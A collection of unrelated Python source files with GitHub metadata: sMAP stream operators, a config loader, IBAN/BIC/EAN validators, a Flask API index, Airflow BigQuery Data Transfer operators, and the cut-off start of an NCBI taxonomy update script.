        self._data(uuids, data)
class GroupedOperatorDriver(OperatorDriver):
    """Driver which selects streams using a `Restrict` tag selector,
    and groups them according to a `Group` tagname.  It runs one
    operator per group, and sends data from each stream to the proper
    operator.

    Make self.operator_class a staticmethod which instantiates a new
    operator.
    """
    operator_class = None

    def setup(self, opts):
        self.restrict = opts.get("Restrict")
        self.group = opts.get("Group")
        self.opstr = opts.get("Operator")
        OperatorDriver.setup(self, opts, self.restrict, shelveoperators=False)

        # look up the streams, units, and group tags.
        client = SmapClient()
        streams = client.tags(self.restrict, '*')
        # 'uuid, Properties/UnitofMeasure, Metadata/SourceName, %s' %
        # self.group)
        #print streams
        groupitems = {}

        # find the groups
        for s in streams:
            if not s[self.group] in groupitems:
                groupitems[s[self.group]] = []
            groupitems[s[self.group]].append(s)

        # instantiate one operator per group with the appropriate inputs
        for group, tags in groupitems.iteritems():
            # NOTE(review): `inputs` is computed but never used -- the
            # operator is constructed from the full tag dicts; presumably
            # operator_class extracts the uuids itself.  Confirm before
            # removing.
            inputs = map(operator.itemgetter('uuid'), tags)
            op = self.operator_class(tags)
            path = '/' + util.str_path(group)
            self.add_operator(path, op)
##############################################################################
##
## Operators for the framework
##
##############################################################################
def extend(a1, a2):
    """Extend each data vector in *a1* with the corresponding vector in *a2*.

    Both arguments are equal-length lists of 2-D numpy arrays.  Returns a new
    list: where a1[i] is empty the new chunk a2[i] is adopted as-is; where
    a2[i] is empty a1[i] is kept; otherwise the two are stacked vertically.

    Fixed: py2-only ``xrange`` replaced with ``range`` (identical iteration
    semantics on both Python 2 and 3) and the parenthesized ``assert(...)``
    call-lookalike rewritten as a plain assert statement.
    """
    assert len(a1) == len(a2)
    rv = [None] * len(a1)
    for i in range(len(a2)):
        if a1[i].shape[0] == 0:
            # nothing accumulated yet: adopt the new chunk directly
            rv[i] = a2[i]
        elif len(a2[i]):
            rv[i] = np.vstack((a1[i], a2[i]))
        else:
            rv[i] = a1[i]
    return rv
def join_intersect(inputs, last=None):
    """Join together streams based on timestamps, throwing out places
    where they do not overlap.

    ``inputs`` is a list of (n_i, 2) time/value arrays; returns a list of
    arrays restricted to the timestamps common to every stream.  (``last``
    is unused; kept for interface compatibility.)
    """
    # reduce() is a builtin on Python 2 but lives in functools on Python 3;
    # the local import keeps the module 2/3 compatible.
    from functools import reduce
    # Fixed: the fold was previously seeded with the *entire* first array,
    # so its value column leaked into the candidate timestamp set.  Seed
    # with the timestamp column only, mirroring join_union.
    times = reduce(lambda acc, stream: np.intersect1d(acc, stream[:, 0]),
                   inputs[1:], inputs[0][:, 0])
    vals = [stream[np.nonzero(np.in1d(stream[:, 0], times)), :][0]
            if len(stream) else null
            for stream in inputs]
    return vals
def join_union(inputs):
    """Join together streams based on timestamps, including all data
    and inserting np.nan for missing values into each stream.

    Returns a new list of arrays all sharing the union time base; a
    single-element input list is returned unchanged.

    Fixed: uses functools.reduce instead of the py2-only builtin reduce,
    keeping the function runnable on both Python 2.6+ and Python 3.
    """
    from functools import reduce
    if len(inputs) == 1: return inputs
    times = reduce(lambda x, y: np.union1d(x, y[:, 0]), inputs[1:],
                   inputs[0][:, 0])
    times = np.reshape(times, (len(times), 1))
    rv = []
    for stream in inputs:
        # start from an all-NaN matrix on the union time base ...
        new = np.column_stack((times,
                               np.ones((len(times), stream.shape[1] - 1)) * np.nan))
        if stream.shape[0] > 0:
            # ... and fill in the rows whose timestamps this stream has
            new[np.nonzero(np.in1d(times, stream[:, 0])), 1:] = stream[:, 1:]
        rv.append(new)
    return rv
def transpose_streams(inputs):
    """Combine time-aligned input streams into one matrix with rows
    [t, v1, v2, ..., vN] (timestamps taken from the first stream)."""
    value_columns = [stream[:, 1:] for stream in inputs]
    return np.column_stack([inputs[0][:, :1]] + value_columns)
class ParallelSimpleOperator(Operator):
    """Operator applied independently to each input stream.

    Subclasses provide a staticmethod ``base_operator`` operating on a
    single stream's data vector.  It may return either a result, or a
    (result, state-kwargs) tuple whose kwargs are passed back on the next
    invocation.  Keyword arguments given here seed the first call.
    """

    def __init__(self, inputs, **initargs):
        self.op = parallelize(self.base_operator, len(inputs), **initargs)
        Operator.__init__(self, inputs, outputs=OP_N_TO_N)

    def process(self, input, **kwargs):
        return self.op(input, **kwargs)
class parallelize(object):
    """Apply a single-stream operator independently to each of *n* streams.

    ``operator`` is called once per stream on every invocation; if it
    returns a (result, kwargs) tuple, the kwargs become that stream's
    keyword state for the next call, otherwise the state is left alone.
    ``opargs`` are extra positional arguments forwarded on every call and
    ``initargs`` seed each stream's keyword state.

    Fixed: py2-only ``xrange`` replaced with ``range`` (identical iteration
    semantics on Python 2 and 3).
    """

    def __init__(self, operator, n, *opargs, **initargs):
        self.operator = operator
        self.n = n
        self.opargs = opargs
        # One state dict per stream.  Note: the entries initially alias the
        # same dict; each is replaced per-stream once the operator returns
        # updated state.
        self.state = [initargs] * n

    def __call__(self, inputs):
        rv = [None] * self.n
        assert self.n == len(inputs)
        for i in range(self.n):
            opdata = self.operator(inputs[i], *self.opargs, **self.state[i])
            if isinstance(opdata, tuple):
                # operator returned (result, new_state)
                rv[i], self.state[i] = opdata
            else:
                rv[i] = opdata
        return rv
class VectorOperator(Operator):
    """Base class for operators which can work on either axis.

    It will automatically allow you to apply your operator either
    across streams or across all data from separate streams in
    parallel.  If the operator can operate on multiple vectors in
    parallel (a la many numpy operators), the base operator should
    have the 'parallel' attribute set on it.

    The operators may either return just a numpy array as a result, or
    a (result, state) tuple; the state gets passed as kwargs on the
    next execution.

    This style of operator is only useful over a finite time period,
    so as the inner operator of a windowing operator or to answer a
    query like "max" or "min" over a date range.
    """
    name = 'vector operator'

    def __init__(self, inputs, *opargs, **initargs):
        # axis 0 / "time": reduce down each stream; axis 1: across streams
        self.axis = 0 if initargs.get('axis', 'time') in ['time', 0] else 1
        initargs['axis'] = self.axis
        # Embed the call arguments into the display name, e.g. "max(axis=0)".
        # NOTE(review): the tuple-unpacking lambda below is Python 2-only
        # syntax (removed in Python 3 by PEP 3113).
        self.name = "%s(%s)" % (self.name,
                                ",".join(list(map(str, opargs)) +
                                         map(lambda (k, v): str(k) + "=" + str(v),
                                             initargs.iteritems())))
        # if we operate in parallel then we also produce n output
        # operators
        outputs = OP_N_TO_N
        # a time-axis reduction needs the whole window before it can emit
        self.block_streaming = (self.axis == 0)
        self.op = parallelize(self.base_operator,
                              len(inputs),
                              *opargs,
                              **initargs)
        Operator.__init__(self, inputs, outputs=outputs)

    def process(self, inputs):
        return self.op(inputs)
class CompositionOperator(Operator):
    """Chain the operator classes listed in ``oplist`` into one operator.

    Set an ``oplist`` attribute (on a subclass or instance) to a list of
    operator constructors; each constructed operator consumes the outputs
    of the previous one, and this object behaves as their composition.
    """

    def __init__(self, inputs):
        self.ops = []
        stage_inputs = inputs
        for opclass in self.oplist:
            stage = opclass(stage_inputs)
            self.ops.append(stage)
            stage_inputs = stage.outputs
        # aggregate the tag requirements and streaming constraint of the chain
        self.required_tags = set.union(*[op.required_tags for op in self.ops])
        self.optional_tags = set.union(*[op.optional_tags for op in self.ops])
        self.block_streaming = any(op.block_streaming for op in self.ops)
        Operator.__init__(self, inputs, stage_inputs)

    def process(self, data):
        result = data
        for op in self.ops:
            result = op(result)
        return result

    def __str__(self):
        return ' < '.join(str(op) for op in reversed(self.ops))
def make_composition_operator(ops):
    """Build an anonymous CompositionOperator subclass with the given oplist."""
    return type('_TmpOp', (CompositionOperator,), {
        'name': 'none',
        'oplist': ops,
    })
|
{
"content_hash": "fd69d7d594ef42b2f3b6dc989ab4a469",
"timestamp": "",
"source": "github",
"line_count": 540,
"max_line_length": 92,
"avg_line_length": 36.48148148148148,
"alnum_prop": 0.5818781725888325,
"repo_name": "samboiki/smap-data",
"id": "9ac2248d2cdc547f04a38c35997f7b4bb30d29e5",
"size": "19700",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "python/smap/operators.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "C",
"bytes": "301328"
},
{
"name": "HTML",
"bytes": "7902"
},
{
"name": "Makefile",
"bytes": "5268"
},
{
"name": "Python",
"bytes": "1394465"
},
{
"name": "R",
"bytes": "23461"
},
{
"name": "Shell",
"bytes": "1273"
},
{
"name": "TeX",
"bytes": "40212"
},
{
"name": "XSLT",
"bytes": "5081"
}
],
"symlink_target": ""
}
|
import os
import geoip2.database
from ConfigParser import SafeConfigParser
from flask.helpers import find_package
from rfk.exc.base import NoConfigException
# Process-wide configuration object, populated by init().
CONFIG = SafeConfigParser()
# geoip2 database reader; opened by init() when GeoIP support is enabled.
geoip = None
def init(enable_geoip=True):
    """Load the rfk configuration into CONFIG and optionally open the GeoIP DB.

    Candidate config locations are derived from the package installation
    prefix and the package path; raises NoConfigException when none of them
    could be read.
    """
    global geoip
    prefix, package_path = find_package(__name__)
    candidates = []
    if prefix is not None:
        candidates.extend([
            os.path.join(prefix, 'local', 'etc', 'rfk-config.cfg'),
            os.path.join(prefix, 'etc', 'rfk-config.cfg'),
            os.path.join(prefix, 'rfk-config.cfg'),
        ])
    if package_path is not None:
        candidates.append(os.path.join(package_path, 'rfk', 'rfk-config.cfg'))
    # ConfigParser.read returns the list of files successfully parsed
    if not CONFIG.read(candidates):
        raise NoConfigException()
    if enable_geoip:
        geoip = geoip2.database.Reader(CONFIG.get('site', 'geoipdb'))
|
{
"content_hash": "549f4c019a1406a22ed7735d702080c3",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 87,
"avg_line_length": 32.464285714285715,
"alnum_prop": 0.6908690869086909,
"repo_name": "buckket/weltklang",
"id": "3a6be6f2d87a93b37f085623aa5736f7954fe405",
"size": "909",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "lib/rfk/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "42171"
},
{
"name": "HTML",
"bytes": "217875"
},
{
"name": "JavaScript",
"bytes": "24784"
},
{
"name": "Makefile",
"bytes": "90"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "278815"
},
{
"name": "Shell",
"bytes": "263"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
import re
import string
from django.core.exceptions import ImproperlyConfigured, ValidationError
from django.utils.deconstruct import deconstructible
from django.utils.translation import ugettext_lazy as _
from . import checksums
from .countries.iso_3166 import ISO_3166_1_ALPHA2_COUNTRY_CODES
# Dictionary of ISO country code to IBAN length.
#
# The official IBAN Registry document is the best source for up-to-date information about IBAN formats and which
# countries are in IBAN.
#
# https://www.swift.com/standards/data-standards/iban
#
# The IBAN_COUNTRY_CODE_LENGTH dictionary has been updated to version 64 of the IBAN Registry document which was published
# in March 2016.
#
# Other Resources:
#
# https://en.wikipedia.org/wiki/International_Bank_Account_Number#IBAN_formats_by_country
# http://www.ecbs.org/iban/france-bank-account-number.html
# https://www.nordea.com/V%C3%A5ra+tj%C3%A4nster/Internationella+produkter+och+tj%C3%A4nster/Cash+Management/IBAN+countries/908472.html
IBAN_COUNTRY_CODE_LENGTH = {'AL': 28, # Albania
'AD': 24, # Andorra
'AE': 23, # United Arab Emirates
'AT': 20, # Austria
'AZ': 28, # Azerbaijan
'BA': 20, # Bosnia and Herzegovina
'BE': 16, # Belgium
'BG': 22, # Bulgaria
'BH': 22, # Bahrain
'BR': 29, # Brazil
'CH': 21, # Switzerland
'CR': 21, # Costa Rica
'CY': 28, # Cyprus
'CZ': 24, # Czech Republic
'DE': 22, # Germany
'DK': 18, # Denmark
'DO': 28, # Dominican Republic
'EE': 20, # Estonia
'ES': 24, # Spain
'FI': 18, # Finland
'FO': 18, # Faroe Islands
'FR': 27, # France + Central African Republic, French Guiana, French Polynesia, Guadeloupe,
# Martinique, Réunion, Saint-Pierre and Miquelon, New Caledonia,
# Wallis and Futuna
'GB': 22, # United Kingdom + Guernsey, Isle of Man, Jersey
'GE': 22, # Georgia
'GI': 23, # Gibraltar
'GL': 18, # Greenland
'GR': 27, # Greece
'GT': 28, # Guatemala
'HR': 21, # Croatia
'HU': 28, # Hungary
'IE': 22, # Ireland
'IL': 23, # Israel
'IS': 26, # Iceland
'IT': 27, # Italy
'JO': 30, # Jordan
'KZ': 20, # Kazakhstan
'KW': 30, # Kuwait
'LB': 28, # Lebanon
'LC': 32, # Saint Lucia
'LI': 21, # Liechtenstein
'LT': 20, # Lithuania
'LU': 20, # Luxembourg
'LV': 21, # Latvia
'MC': 27, # Monaco
'MD': 24, # Moldova
'ME': 22, # Montenegro
'MK': 19, # Macedonia
'MT': 31, # Malta
'MR': 27, # Mauritania
'MU': 30, # Mauritius
'NL': 18, # Netherlands
'NO': 15, # Norway
'PS': 29, # Palestine
'PK': 24, # Pakistan
'PL': 28, # Poland
'PT': 25, # Portugal + Sao Tome and Principe
'QA': 29, # Qatar
'RO': 24, # Romania
'RS': 22, # Serbia
'SA': 24, # Saudi Arabia
'SC': 31, # Seychelles
'SE': 24, # Sweden
'SI': 19, # Slovenia
'SK': 24, # Slovakia
'SM': 27, # San Marino
'ST': 25, # Sao Tome And Principe
'TL': 23, # Timor-Leste
'TN': 24, # Tunisia
'TR': 26, # Turkey
'UA': 29, # Ukraine
'VG': 24, # British Virgin Islands
'XK': 20} # Republic of Kosovo (user-assigned country code)
# Nordea has catalogued IBANs for some additional countries but they are not part of the official IBAN network yet.
#
# Reference:
# https://www.nordea.com/V%C3%A5ra+tj%C3%A4nster/Internationella+produkter+och+tj%C3%A4nster/Cash+Management/IBAN+countries/908472.html
NORDEA_COUNTRY_CODE_LENGTH = {'AO': 25, # Angola
'BJ': 28, # Benin
'BF': 27, # Burkina Faso
'BI': 16, # Burundi
'CI': 28, # Ivory Coast
'CG': 27, # Congo
'CM': 27, # Cameroon
'CV': 25, # Cape Verde
'DZ': 24, # Algeria
'EG': 27, # Egypt
'GA': 27, # Gabon
'IR': 26, # Iran
'MG': 27, # Madagascar
'ML': 28, # Mali
'MZ': 25, # Mozambique
'SN': 28} # Senegal
@deconstructible
class IBANValidator(object):
    """ A validator for International Bank Account Numbers (IBAN - ISO 13616-1:2007). """

    def __init__(self, use_nordea_extensions=False, include_countries=None):
        # use_nordea_extensions: also accept the Nordea-catalogued countries
        # that are not officially part of the IBAN network yet.
        # include_countries: optional whitelist restricting valid country codes.
        self.use_nordea_extensions = use_nordea_extensions
        self.include_countries = include_countries

        self.validation_countries = IBAN_COUNTRY_CODE_LENGTH.copy()
        if self.use_nordea_extensions:
            self.validation_countries.update(NORDEA_COUNTRY_CODE_LENGTH)

        # Fail fast at configuration time if the whitelist names a country
        # the validator could never accept.
        if self.include_countries:
            for country_code in self.include_countries:
                if country_code not in self.validation_countries:
                    msg = 'Explicitly requested country code %s is not part of the configured IBAN validation set.' % country_code
                    raise ImproperlyConfigured(msg)

    def __eq__(self, other):
        # Equality on configuration; used e.g. by Django's migration
        # framework to detect validator changes.
        return (self.use_nordea_extensions == other.use_nordea_extensions and
                self.include_countries == other.include_countries)

    @staticmethod
    def iban_checksum(value):
        """ Returns check digits for an input IBAN number. Original checksum in input value is ignored. """
        # 1. Move the two initial characters to the end of the string, replacing checksum for '00'
        value = value[4:] + value[:2] + '00'

        # 2. Replace each letter in the string with two digits, thereby expanding the string, where
        #    A = 10, B = 11, ..., Z = 35.
        value_digits = ''
        for x in value:
            if '0' <= x <= '9':
                value_digits += x
            elif 'A' <= x <= 'Z':
                # ord('A') - 55 == 10, so letters map to 10..35
                value_digits += str(ord(x) - 55)
            else:
                raise ValidationError(_('%s is not a valid character for IBAN.') % x)

        # 3. The remainder of the number above when divided by 97 is then subtracted from 98.
        return '%02d' % (98 - int(value_digits) % 97)

    def __call__(self, value):
        """
        Validates the IBAN value using the official IBAN validation algorithm.

        https://en.wikipedia.org/wiki/International_Bank_Account_Number#Validating_the_IBAN
        """
        if value is None:
            return value

        # Normalise: uppercase and strip the usual presentation separators.
        value = value.upper().replace(' ', '').replace('-', '')

        # Check that the total IBAN length is correct as per the country. If not, the IBAN is invalid.
        country_code = value[:2]
        if country_code in self.validation_countries:

            if self.validation_countries[country_code] != len(value):
                msg_params = {'country_code': country_code, 'number': self.validation_countries[country_code]}
                raise ValidationError(_('%(country_code)s IBANs must contain %(number)s characters.') % msg_params)

        else:
            raise ValidationError(_('%s is not a valid country code for IBAN.') % country_code)
        if self.include_countries and country_code not in self.include_countries:
            raise ValidationError(_('%s IBANs are not allowed in this field.') % country_code)

        # Finally, recompute the check digits and compare with positions 3-4.
        if self.iban_checksum(value) != value[2:4]:
            raise ValidationError(_('Not a valid IBAN.'))
@deconstructible
class BICValidator(object):
    """
    A validator for SWIFT Business Identifier Codes (ISO 9362:2009). Validation is based on the BIC structure found on
    wikipedia.

    https://en.wikipedia.org/wiki/ISO_9362#Structure
    """

    def __eq__(self, other):
        # The validator has no configurable state, so any two instances are
        # interchangeable.
        return True

    def __call__(self, value):
        if value is None:
            return value
        value = value.upper()

        # A BIC is either 8 (BIC8) or 11 (BIC11) characters long.
        if len(value) not in (8, 11):
            raise ValidationError(_('BIC codes have either 8 or 11 characters.'))

        # Characters 1-4: the institution code, uppercase A-Z only.
        institution_code = value[:4]
        if any(ch not in string.ascii_uppercase for ch in institution_code):
            raise ValidationError(_('%s is not a valid institution code.') % institution_code)

        # Characters 5-6: an ISO 3166-1 alpha-2 country code.
        country_code = value[4:6]
        if country_code not in ISO_3166_1_ALPHA2_COUNTRY_CODES:
            raise ValidationError(_('%s is not a valid country code.') % country_code)
@deconstructible
class EANValidator(object):
    """
    A generic validator for EAN-like codes with the last digit being the checksum.

    http://en.wikipedia.org/wiki/International_Article_Number_(EAN)

    :param strip_nondigits: when True, every non-digit character is removed
        from the value before the checksum is verified.
    :param message: optional override for the validation error message.
    """
    message = _('Not a valid EAN code.')

    def __init__(self, strip_nondigits=False, message=None):
        if message is not None:
            self.message = message
        self.strip_nondigits = strip_nondigits

    def __eq__(self, other):
        # Bug fix: the original accessed ``other.message`` unconditionally,
        # so comparing against an unrelated object raised AttributeError.
        # Returning NotImplemented lets Python fall back to identity/False.
        if not isinstance(other, EANValidator):
            return NotImplemented
        # The previous ``hasattr(self, 'message')`` guard was dead code:
        # ``message`` is always set as a class attribute.
        return (self.message == other.message and
                self.strip_nondigits == other.strip_nondigits)

    def __call__(self, value):
        if value is None:
            return value
        if self.strip_nondigits:
            # re.sub is equivalent to compiling the pattern and calling
            # .sub(); the re module caches the compiled pattern.
            value = re.sub(r'[^\d]+', '', value)
        if not checksums.ean(value):
            raise ValidationError(self.message, code='invalid')
|
{
"content_hash": "ee2c3804b2c6eb9c5204cf6c4d2b99a8",
"timestamp": "",
"source": "github",
"line_count": 260,
"max_line_length": 135,
"avg_line_length": 43.80769230769231,
"alnum_prop": 0.4906057945566286,
"repo_name": "agustin380/django-localflavor",
"id": "9605266794be1ffaaec7b79c58a29a01cc2a0c47",
"size": "11415",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "localflavor/generic/validators.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "814929"
}
],
"symlink_target": ""
}
|
from flask import Blueprint, url_for
# Blueprint exposing this API's root endpoint; registered by the application.
api = Blueprint('api', __name__)
# Version key reported in the index payload below.
version = 'v1.0'
from . import mail, event, errors, utils
from .decorators import json
def endpoints():
    """Return the main endpoints of the RESTful API as a description->URL map."""
    mails_url = url_for('api.get_mails', _external=True)
    new_mail_url = url_for('api.new_mail', _external=True)
    return {
        'Retrieve the collection of all the email [GET]': mails_url,
        'Create a new email [POST]': new_mail_url,
    }
@api.route('/')
@json
def index():
    """Expose the API version together with its main endpoints."""
    payload = {version: endpoints()}
    return {'versions': payload}
|
{
"content_hash": "835ff30b1fc6e74ea9aa2af2b4a0233d",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 99,
"avg_line_length": 25.727272727272727,
"alnum_prop": 0.6431095406360424,
"repo_name": "prisconapoli/mercury",
"id": "21547b0c7ac51a096bf035d2ac3764cf2e53ec6a",
"size": "566",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/api_1_0/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2413"
},
{
"name": "HTML",
"bytes": "6190"
},
{
"name": "Python",
"bytes": "50852"
},
{
"name": "Shell",
"bytes": "354"
}
],
"symlink_target": ""
}
|
"""
This module contains Google BigQuery Data Transfer Service operators.
"""
from typing import Optional, Sequence, Tuple
from google.api_core.retry import Retry
from google.protobuf.json_format import MessageToDict
from airflow.models import BaseOperator
from airflow.providers.google.cloud.hooks.bigquery_dts import BiqQueryDataTransferServiceHook, get_object_id
from airflow.utils.decorators import apply_defaults
class BigQueryCreateDataTransferOperator(BaseOperator):
    """
    Creates a new data transfer configuration.

    .. seealso::
        For more information on how to use this operator, take a look at the guide:
        :ref:`howto/operator:BigQueryCreateDataTransferOperator`

    :param transfer_config: Data transfer configuration to create.
    :type transfer_config: dict
    :param project_id: The BigQuery project id where the transfer configuration should be
        created. If None or missing, the default project_id from the GCP connection is used.
    :type project_id: str
    :param authorization_code: Authorization code to use with this transfer configuration.
        Required only if new credentials are needed.
    :type authorization_code: Optional[str]
    :param retry: A retry object used to retry requests. When ``None``,
        requests are not retried.
    :type retry: Optional[google.api_core.retry.Retry]
    :param timeout: Seconds to wait for the request to complete. If a retry
        object is given, the timeout applies to each individual attempt.
    :type timeout: Optional[float]
    :param metadata: Additional metadata provided to the method.
    :type metadata: Optional[Sequence[Tuple[str, str]]]
    :param gcp_conn_id: The connection ID used to connect to Google Cloud Platform.
    :type gcp_conn_id: str
    """

    template_fields = (
        "transfer_config",
        "project_id",
        "authorization_code",
        "gcp_conn_id",
    )

    @apply_defaults
    def __init__(
        self,
        transfer_config: dict,
        project_id: Optional[str] = None,
        authorization_code: Optional[str] = None,
        retry: Retry = None,
        timeout: Optional[float] = None,
        metadata: Optional[Sequence[Tuple[str, str]]] = None,
        gcp_conn_id="google_cloud_default",
        *args,
        **kwargs
    ):
        super().__init__(*args, **kwargs)
        self.transfer_config = transfer_config
        self.project_id = project_id
        self.authorization_code = authorization_code
        self.retry = retry
        self.timeout = timeout
        self.metadata = metadata
        self.gcp_conn_id = gcp_conn_id

    def execute(self, context):
        """Create the transfer config, push its id to XCom, return it as a dict."""
        dts_hook = BiqQueryDataTransferServiceHook(gcp_conn_id=self.gcp_conn_id)
        self.log.info("Creating DTS transfer config")
        created = dts_hook.create_transfer_config(
            project_id=self.project_id,
            transfer_config=self.transfer_config,
            authorization_code=self.authorization_code,
            retry=self.retry,
            timeout=self.timeout,
            metadata=self.metadata,
        )
        config = MessageToDict(created)
        config_id = get_object_id(config)
        self.log.info("Created DTS transfer config %s", config_id)
        self.xcom_push(context, key="transfer_config_id", value=config_id)
        return config
class BigQueryDeleteDataTransferConfigOperator(BaseOperator):
    """
    Deletes a transfer configuration.

    .. seealso::
        For more information on how to use this operator, take a look at the guide:
        :ref:`howto/operator:BigQueryDeleteDataTransferConfigOperator`

    :param transfer_config_id: Id of the transfer config to delete.
    :type transfer_config_id: str
    :param project_id: The BigQuery project id owning the transfer configuration.
        If None or missing, the default project_id from the GCP connection is used.
    :type project_id: str
    :param retry: A retry object used to retry requests. When ``None``,
        requests are not retried.
    :type retry: Optional[google.api_core.retry.Retry]
    :param timeout: Seconds to wait for the request to complete. If a retry
        object is given, the timeout applies to each individual attempt.
    :type timeout: Optional[float]
    :param metadata: Additional metadata provided to the method.
    :type metadata: Optional[Sequence[Tuple[str, str]]]
    :param gcp_conn_id: The connection ID used to connect to Google Cloud Platform.
    :type gcp_conn_id: str
    """

    template_fields = ("transfer_config_id", "project_id", "gcp_conn_id")

    @apply_defaults
    def __init__(
        self,
        transfer_config_id: str,
        project_id: Optional[str] = None,
        retry: Retry = None,
        timeout: Optional[float] = None,
        metadata: Optional[Sequence[Tuple[str, str]]] = None,
        gcp_conn_id="google_cloud_default",
        *args,
        **kwargs
    ):
        super().__init__(*args, **kwargs)
        self.transfer_config_id = transfer_config_id
        self.project_id = project_id
        self.retry = retry
        self.timeout = timeout
        self.metadata = metadata
        self.gcp_conn_id = gcp_conn_id

    def execute(self, context):
        """Delete the configured transfer config; returns nothing."""
        dts_hook = BiqQueryDataTransferServiceHook(gcp_conn_id=self.gcp_conn_id)
        dts_hook.delete_transfer_config(
            transfer_config_id=self.transfer_config_id,
            project_id=self.project_id,
            retry=self.retry,
            timeout=self.timeout,
            metadata=self.metadata,
        )
class BigQueryDataTransferServiceStartTransferRunsOperator(BaseOperator):
    """
    Start manual transfer runs to be executed now with schedule_time equal
    to current time. The transfer runs can be created for a time range where
    the run_time is between start_time (inclusive) and end_time
    (exclusive), or for a specific run_time.

    .. seealso::
        For more information on how to use this operator, take a look at the guide:
        :ref:`howto/operator:BigQueryDataTransferServiceStartTransferRunsOperator`

    :param transfer_config_id: Id of transfer config to be used.
    :type transfer_config_id: str
    :param requested_time_range: Time range for the transfer runs that should be started.
        If a dict is provided, it must be of the same form as the protobuf
        message `~google.cloud.bigquery_datatransfer_v1.types.TimeRange`
    :type requested_time_range: Union[dict, ~google.cloud.bigquery_datatransfer_v1.types.TimeRange]
    :param requested_run_time: Specific run_time for a transfer run to be started. The
        requested_run_time must not be in the future. If a dict is provided, it
        must be of the same form as the protobuf message
        `~google.cloud.bigquery_datatransfer_v1.types.Timestamp`
    :type requested_run_time: Union[dict, ~google.cloud.bigquery_datatransfer_v1.types.Timestamp]
    :param project_id: The BigQuery project id where the transfer configuration should be
        created. If set to None or missing, the default project_id from the GCP connection is used.
    :type project_id: str
    :param retry: A retry object used to retry requests. If `None` is
        specified, requests will not be retried.
    :type retry: Optional[google.api_core.retry.Retry]
    :param timeout: The amount of time, in seconds, to wait for the request to
        complete. Note that if retry is specified, the timeout applies to each individual
        attempt.
    :type timeout: Optional[float]
    :param metadata: Additional metadata that is provided to the method.
    :type metadata: Optional[Sequence[Tuple[str, str]]]
    :param gcp_conn_id: The connection ID used to connect to Google Cloud Platform.
    :type gcp_conn_id: str
    """

    template_fields = (
        "transfer_config_id",
        "project_id",
        "requested_time_range",
        "requested_run_time",
        "gcp_conn_id",
    )

    @apply_defaults
    def __init__(
        self,
        transfer_config_id: str,
        project_id: Optional[str] = None,
        requested_time_range: Optional[dict] = None,
        requested_run_time: Optional[dict] = None,
        retry: Retry = None,
        timeout: Optional[float] = None,
        metadata: Optional[Sequence[Tuple[str, str]]] = None,
        gcp_conn_id="google_cloud_default",
        *args,
        **kwargs
    ):
        super().__init__(*args, **kwargs)
        self.project_id = project_id
        self.transfer_config_id = transfer_config_id
        self.requested_time_range = requested_time_range
        self.requested_run_time = requested_run_time
        self.retry = retry
        self.timeout = timeout
        self.metadata = metadata
        self.gcp_conn_id = gcp_conn_id

    def execute(self, context):
        """Submit the manual runs, push the first run id to XCom, return the result dict."""
        hook = BiqQueryDataTransferServiceHook(gcp_conn_id=self.gcp_conn_id)
        self.log.info('Submitting manual transfer for %s', self.transfer_config_id)
        response = hook.start_manual_transfer_runs(
            transfer_config_id=self.transfer_config_id,
            requested_time_range=self.requested_time_range,
            requested_run_time=self.requested_run_time,
            project_id=self.project_id,
            retry=self.retry,
            timeout=self.timeout,
            metadata=self.metadata,
        )
        result = MessageToDict(response)
        run_id = None
        # Robustness fix: the original indexed result['runs'][0] after only a
        # key-presence check, which raises IndexError for a present-but-empty
        # list. Guard on truthiness instead.
        runs = result.get('runs')
        if runs:
            run_id = get_object_id(runs[0])
        self.xcom_push(context, key="run_id", value=run_id)
        self.log.info('Transfer run %s submitted successfully.', run_id)
        return result
|
{
"content_hash": "182e68897471df96231416ea0537f6b1",
"timestamp": "",
"source": "github",
"line_count": 236,
"max_line_length": 108,
"avg_line_length": 41.23728813559322,
"alnum_prop": 0.6642005754212906,
"repo_name": "mtagle/airflow",
"id": "0c904500a93aa9855e27f210606daeb1fd34a3db",
"size": "10519",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "airflow/providers/google/cloud/operators/bigquery_dts.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "13715"
},
{
"name": "Dockerfile",
"bytes": "17280"
},
{
"name": "HTML",
"bytes": "148492"
},
{
"name": "JavaScript",
"bytes": "25360"
},
{
"name": "Jupyter Notebook",
"bytes": "2933"
},
{
"name": "Mako",
"bytes": "1339"
},
{
"name": "Python",
"bytes": "10006634"
},
{
"name": "Shell",
"bytes": "217011"
},
{
"name": "TSQL",
"bytes": "879"
}
],
"symlink_target": ""
}
|
"""Script updating local taxonomy database.
Script allows to update local taxonomy database using new taxonomy dumps from
NCBI taxonomy database.
Requirements:
Names file - path to NCBI taxonomy dmp file containing mapping of
scientific names onto Taxonomy IDs. Default is 'names.dmp'.
Nodes file - path to NCBI taxonomy dmp file containing node definitions with
tax id being mapped to a higher hierarchy node.
The default is 'nodes.dmp'.
Links file - path to a file containing protein id - taxonomy id mapping.
The default is - 'protein_taxonomy.lnk'
"""
# External libraries imports
from os import sys
# Internal modules import
import ncbi_taxonomies as ncbi
from taxonomydb import TaxDb
from own_objects import Node, ProteinLink
# Directory where all files from NCBI have been downloaded and extracted.
# NOTE(review): read at import time, so importing this module without a
# command-line argument raises IndexError -- confirm intended script-only use.
ncbi_download = sys.argv[1]
def update_nodes(names_file=None, nodes_file=None):
    """Update the nodes collection of the database from NCBI dump files.

    :param names_file: path to the NCBI names.dmp file; defaults to
        '<ncbi_download>/names.dmp'.
    :param nodes_file: path to the NCBI nodes.dmp file; defaults to
        '<ncbi_download>/nodes.dmp'.
    """
    print('Reading nodes...')
    if not names_file:
        names_file = '%s/names.dmp' % ncbi_download
    if not nodes_file:
